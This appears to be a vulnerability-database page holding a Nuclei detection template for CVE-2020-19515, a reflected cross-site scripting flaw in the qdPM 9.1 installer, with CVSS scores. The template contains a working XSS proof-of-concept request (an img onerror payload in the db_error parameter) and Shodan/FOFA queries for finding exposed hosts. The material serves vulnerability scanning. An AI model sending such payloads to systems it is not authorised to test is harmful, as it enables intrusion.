Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-19515
HistoryJul 07, 2023 - 9:38 a.m.

qdPM 9.1 - Cross-site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
2
cve2020
xss
qdpm
unauth
vulnerability
web
injection
patches
updates
data theft

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
id: CVE-2020-19515

info:
  name: qdPM 9.1 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
  reference:
    - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
    - http://qdpm.net/download-qdpm-free-project-management
    - https://nvd.nist.gov/vuln/detail/CVE-2020-19515
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-19515
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43259
    cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qdpm
    product: qdpm
    shodan-query: http.favicon.hash:762074255
    fofa-query: icon_hash=762074255
  tags: cve2020,cve,xss,qdpm,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain) />'
          - 'qdPM'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202662f3efba8ad4fa6c4bd4eda85a86f4d60bb28f37bc67a89825d2b729a9553402210099ecddb0b9cde3c2562289b3040b8437a617d1d355c9d9792ec5196bf23f71e4:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

Related for NUCLEI:CVE-2020-19515